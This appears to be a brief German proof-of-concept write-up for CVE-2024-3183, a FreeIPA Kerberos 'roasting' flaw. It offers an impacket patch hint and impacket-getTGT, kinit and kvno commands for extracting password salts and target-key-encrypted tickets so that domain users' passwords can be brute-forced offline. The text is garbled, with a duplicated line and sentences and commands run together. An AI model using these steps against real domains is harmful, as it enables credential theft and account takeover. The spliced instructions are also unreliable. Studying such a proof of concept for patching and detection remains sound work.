
PoC für CVE-2024-3183 (FreeIPA Rosting)
POC für CVE-2024-3183 (FreeIPA Rosting)
Auswirkungen: Ein Benutzer mit niedrigen Berechtigungen kann einen Hash der Passwörter aller Domänenbenutzer erhalten und einen Offline-Brute-Force-Angriff durchführen (Kerberoasting).
Patch für impacket-getTGT:
decoder.decode.defaultErrorState = stGetValueDecoderByTag zu impacket/krb5/kerberosv5.py hinzu.decoder.decode.defaultErrorState = stGetValueDecoderByTag zu impacket/krb5/kerberosv5.py hinzu.-service und der Option -debug verwenden, um das Salt in einem Befehl zu erhalten.
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - Passwörter.
kinit -S target userund Sie erhalten ein TGT, das mit dem Schlüssel des Zielbenutzers verschlüsselt wurde.